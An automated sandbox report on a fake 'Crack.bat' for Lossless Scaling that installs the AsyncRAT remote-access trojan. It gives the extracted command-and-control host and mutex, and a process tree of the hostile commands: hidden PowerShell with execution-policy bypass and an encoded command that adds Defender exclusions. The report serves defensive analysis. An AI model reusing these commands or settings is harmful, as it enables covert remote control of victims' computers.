Analysis
-
max time kernel
489s -
max time network
595s -
platform
windows10-ltsc 2021_x64 -
resource
win10ltsc2021-20250113-en -
resource tags
-
submitted
25-01-2025 10:43
General
-
Target
lossless scaling/Crack.bat
-
Size
16KB
-
MD5
1f5ea98d27f9d4dfe7da57a12ab5cfb7
-
SHA1
2565fb81fe31c17562106ab046f9d8a8f1d0b3c5
-
SHA256
9dba4747cdba2b31fbbcd2c30ef3c71d2e63ae01a8cd1765d385d065bafa21e5
-
SHA512
3e35d5d4d2212376eeed7be09aaeb6ed200d644ef50122f586a51f130d027f3e54f7af9bd14ba184a0ffe4a13f4cb4dff9e5da776df24f7b710f665aece3dfe4
-
SSDEEP
192:wA7T3nY6jgx4v7UHKtg+NS+7iASgon5ydpakLNfW9FATzSdcO7lgtVhwqgc8Z+Co:nya1TwSaerstRGj
Malware Config
Extracted
asyncrat
A 14
Default
3x3.casacam.net:303
MaterxMutex_Egypt2
-
delay
3
-
install
false
-
install_folder
%AppData%
Signatures
-
AsyncRat
AsyncRAT is designed to remotely monitor and control other computers written in C#.
-
Asyncrat family
-
UAC bypass 3 TTPs 1 IoCs
-
Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs
Run Powershell and hide display window.
-
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
-
Executes dropped EXE 6 IoCs
-
Uses the VBS compiler for execution 1 TTPs
-
Suspicious use of SetThreadContext 2 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 4 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
-
Modifies registry class 1 IoCs
-
Runs net.exe
-
Suspicious behavior: AddClipboardFormatListener 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 31 IoCs
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
-
Suspicious use of SetWindowsHookEx 1 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
-
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\lossless scaling\Crack.bat"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet session2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 session3⤵
-
-
-
C:\Windows\system32\xcopy.exexcopy "C:\Users\Admin\AppData\Local\Temp\lossless scaling\\language\en-US" "C:\Users\Public\IObitUnlocker" /E /H /C /I2⤵
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle Hidden -NoProfile -ExecutionPolicy Bypass -Command "& {Get-Content 'C:\Users\Public\IObitUnlocker\UK.dll' | Out-String | Invoke-Expression}"2⤵
- UAC bypass
- Command and Scripting Interpreter: PowerShell
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /query /tn administrator3⤵
-
-
C:\Users\Public\IObitUnlocker\RAR.exe"C:\Users\Public\IObitUnlocker\RAR.exe" x -pahmad..123 -o+ C:\Users\Public\IObitUnlocker\EN.dll C:\Users\Public\IObitUnlocker\3⤵
- Executes dropped EXE
-
-
C:\Users\Public\IObitUnlocker\BR\Font.exe"C:\Users\Public\IObitUnlocker\BR\Font.exe"3⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\esentutl.exe"C:\Users\Admin\AppData\Local\Microsoft\Windows\esentutl.exe"4⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
-
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Public\IObitUnlocker\Loader.vbs"3⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass iex([IO.File]::ReadAllText('C:\Users\Public\IObitUnlocker\Report.ps1'))4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"5⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: AddClipboardFormatListener
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"6⤵
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"6⤵
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"6⤵
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"6⤵
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"6⤵
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c start /b powershell –ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\Admin\AppData\Local\Temp\ahnjcb.exe"' & exit6⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell –ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\Admin\AppData\Local\Temp\ahnjcb.exe"'7⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\ahnjcb.exe"C:\Users\Admin\AppData\Local\Temp\ahnjcb.exe"8⤵
- Executes dropped EXE
-
-
-
-
-
-
-
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /query /tn administrator3⤵
-
-
-
C:\Windows\system32\mode.commode con: cols=80 lines=102⤵
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAEEAZABtAGkAbgBcAEEAcABwAEQAYQB0AGEAXABSAG8AYQBtAGkAbgBnAFwASABlAGwAcABMAGkAbgBrAFwAQwBlAHIAdABpAGYAaQBjAGEAdABlAC4AZQB4AGUALABDADoAXABXAGkAbgBkAG8AdwBzAFwATQBpAGMAcgBvAHMAbwBmAHQALgBOAEUAVABcAEYAcgBhAG0AZQB3AG8AcgBrADYANABcAHYANAAuADAALgAzADAAMwAxADkAXABBAGQAZABJAG4AUAByAG8AYwBlAHMAcwAuAGUAeABlACwAQwA6AFwAVQBzAGUAcgBzAFwAQQBkAG0AaQBuAFwAQQBwAHAARABhAHQAYQBcAEwAbwBjAGEAbABcAFQAZQBtAHAAXAAgAC0ARgBvAHIAYwBlADsAIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAHIAbwBjAGUAcwBzACAAQwA6AFwAVwBpAG4AZABvAHcAcwBcAE0AaQBjAHIAbwBzAG8AZgB0AC4ATgBFAFQAXABGAHIAYQBtAGUAdwBvAHIAawA2ADQAXAB2ADQALgAwAC4AMwAwADMAMQA5AFwAQQBkAGQASQBuAFAAcgBvAGMAZQBzAHMALgBlAHgAZQAsAEMAOgBcAFUAcwBlAHIAcwBcAEEAZABtAGkAbgBcAEEAcABwAEQAYQB0AGEAXABSAG8AYQBtAGkAbgBnAFwASABlAGwAcABMAGkAbgBrAFwAQwBlAHIAdABpAGYAaQBjAGEAdABlAC4AZQB4AGUA1⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\AppData\Roaming\HelpLink\Certificate.exe"C:\Users\Admin\AppData\Roaming\HelpLink\Certificate.exe"1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe2⤵
- Suspicious behavior: EnumeratesProcesses
-
-
C:\Users\Admin\AppData\Roaming\HelpLink\Certificate.exe"C:\Users\Admin\AppData\Roaming\HelpLink\Certificate.exe"1⤵
- Executes dropped EXE
Network
MITRE ATT&CK Enterprise v15
Privilege Escalation
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Defense Evasion
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Impair Defenses
1Disable or Modify Tools
1Modify Registry
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
838B
MD5bd7f5a09bbf2b215004beab8ae6a2ae3
SHA1f28df4d4cb35872a6fe37da8863a63d18d890684
SHA256008f6f602020982d596e063921a36bf3cf1bef391d3548fa6a30a894706ecdad
SHA512d3ce98cb87b0edd2d58f0ecce574da70c02140bb194644825fc77c79d48b82bfc93529381ad41a29331780cf472883e5a711ae9c73027bd7f7f6f3d434ce0f2f
-
Filesize
3KB
MD5013539b02858ffd9199c1d5470ec6271
SHA11fff5f4dfa46065464a365ca20b38ed184172da1
SHA25625b47917117af57fdddc37ddc931f3ae0b79c0f80a077f82cc8dec18eb782106
SHA5125ff123c5ec95cb26f89ba1024a11d6756e36fa0a7c42f106b742e0c6b1eb197cce8adb23fe24b0af95509222eb8ab966c90462e6d468af23857ea057182a7e2d
-
Filesize
15KB
MD5d3e2fae9570ca0c00825e59823367492
SHA1417ebf775741ca1e7235213fd376ef5de8bcdad9
SHA2560d867850ca1a74b59eca1048f1f0eafb2db45050d315b24df5c1848704d7b66a
SHA512bc8120f0bf45437f206c5474b83062b039f7e39ac8b46b4343ad5f5e2563f30b82a718e70c75766c8cd5f49580195686acc9c7961ca84ae7138f89aae917f02c
-
Filesize
1KB
MD582e59d8ff335dde2e7a21833b4c07add
SHA1606e9754d75927bbfdf301d05c272024c56289cd
SHA2561fb73730cb85dc5839939994b282c035145bd5af6d6e3d5ef2a8a149d915ab36
SHA5126c9e9fa9accc4a8d950f46a466160f90c00fe525af6df5c379a7ddb9a8c1badaa7e319721a7220344b5f3a564b38f320bd1e4199a8b49aa49674dfb142a21706
-
Filesize
1KB
MD5869dac58c3e5afb58c52eea96cbb4a9a
SHA1faf44a82c59a0aa0557b2ee97c1206246670d1b8
SHA256c8e4325dc3f4ca046350f6d78bdd03de023b116a10cffa78df40bde2f18b13c8
SHA512b1c4a0ca288d784108e593dc4bc620ddff447d015c978bf2ed8f36841cf44a8957455879dd1919c311e050a7fe1edf3d396c90d90cfb19ce7f1f3f846a9843e8
-
Filesize
156KB
MD56981d94fbcc31ca50551300f5b4a96a3
SHA1e38b3a74f2951f5480fb67acc75d41f3e2b4f70e
SHA2568c19a90379611efc39c3e96529de2e82a99e3e049d36ef6563ec975836e47811
SHA512b94e87c641009ab8206c91ede3e35ab3b65a94fa3be5f4ce7c8a2b17af018f03801086c850427f4d51f4867a3d0a85aaf58ece9fd7f6a36f68df29da430c8d5d
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
628KB
MD51d53f5a867dd69486834f81a7a490a2d
SHA14154fe5c8e4b1a6141c8ea21b9f1a13ed7a4d91c
SHA256f804e0bf63f75b3a11c182054a8f02d4f9d2fb182c3a49b105dece388d8d06a1
SHA512769c1e9d9ab34bbd6ff3a0ee06d8e21a64e47861712bf92644a7f9f8d1b035dcf148a6d5d92da16ed82c720b0366e26fb93a0fef91e12a70c1790514bf2fe5c1
-
Filesize
434KB
MD568c9ee084cc409309b116ec6aea890a8
SHA1efd6aab18a08a63b146ad587d1fa08e0bb19bebc
SHA256ef2cbfdfdd874c6c3ea11223b369fbd5f155d20c680ae1e59ac74e6f1bb74a9d
SHA5129809477d42df7bbbaea04da5eda4a4f2ae3114b33541a4efd7003bab339d1c6ddf2f9a61b2ba781c0f5de82b030859c8ac76cbe697b296046227c1dc6b547a25
-
Filesize
308B
MD52993b76e0b0ba015caf654881638a0c0
SHA17fbd5f28fb2f6f948cbeb3c4dd5b0672bdfe4bcd
SHA2560e131f595ef67c160de9727d9a92a84b50393e66dd242f330736b916e1bf20a3
SHA512a61e0e7f92f0d78c27939ba21bdda6ff97503adc44e42a4b7eab3c4c1bea8acad4517b90db3430cabc237c2db01e60ab3a2a78e237ae01a896bd09aabba067cb
-
Filesize
629KB
MD5d3e9f98155c0faab869ccc74fb5e8a1e
SHA18e4feaad1d43306fdd8aa66efa443bca7afde710
SHA2563e0fdb5c40336482dacef3496116053d7772a51720900141b3c6f35c6e9b351b
SHA5122760c139ef276f406770675d89fb667f3369a9e1943a6eff2c18f391114018ad6fdce9daf0b499b18081ef22243ef04d74ff21cbd346eb31a1ddbcb79756697d
-
Filesize
457KB
MD5dd3f962ccc2f5b5f34700307e35138f8
SHA190d80df0ef716260a7d4ed466cf40caf966f0969
SHA256e273b5a8cf3d3d37ff676251aa4f41e3726b45b3280f8bf84bf618ca05cca9bb
SHA512619fba6cd9b8aae26db23f9cbd6db4870f969abd198d3fe8551703a1e2c46a9d1fd861f7b9462d82581b322209795c1e00762ebe31e0a1383c8a10df8e4a9eae
-
Filesize
10.8MB
-
Filesize
8KB
-
Filesize
10.8MB
-
Filesize
10.8MB
-
Filesize
10.8MB
-
Filesize
10.8MB
-
Filesize
8KB
-
Filesize
10.8MB
-
Filesize
10.8MB
-
Filesize
136KB
-
Filesize
664KB
-
Filesize
4.8MB
-
Filesize
624KB
-
Filesize
32KB
-
Filesize
304KB
-
Filesize
24KB
-
Filesize
344KB
-
Filesize
40KB
-
Filesize
584KB
-
Filesize
5.6MB
-
Filesize
624KB
-
Filesize
456KB
-
Filesize
304KB
-
Filesize
600KB
-
Filesize
136KB
-
Filesize
216KB
-
Filesize
6.8MB
-
Filesize
136KB
-
Filesize
408KB
-
Filesize
3.3MB
-
Filesize
104KB
-
Filesize
120KB
-
Filesize
976KB
-
Filesize
976KB
-
Filesize
336KB
-
Filesize
304KB
-
Filesize
344KB
-
Filesize
648KB
-
Filesize
992KB
-
Filesize
976KB
-
Filesize
976KB
-
Filesize
976KB
-
Filesize
976KB
-
Filesize
976KB
-
Filesize
976KB
-
Filesize
976KB
-
Filesize
976KB
-
Filesize
976KB
-
Filesize
976KB
-
Filesize
976KB
-
Filesize
976KB
-
Filesize
976KB
-
Filesize
976KB
-
Filesize
976KB
-
Filesize
976KB
-
Filesize
976KB
-
Filesize
976KB
-
Filesize
976KB
-
Filesize
976KB
-
Filesize
976KB
-
Filesize
976KB
-
Filesize
976KB
-
Filesize
976KB
-
Filesize
976KB
-
Filesize
976KB
-
Filesize
976KB
-
Filesize
976KB
-
Filesize
976KB
-
Filesize
976KB
-
Filesize
40KB
-
Filesize
472KB
-
Filesize
120KB
-
Filesize
408KB
-
Filesize
48KB
-
Filesize
56KB
-
Filesize
88KB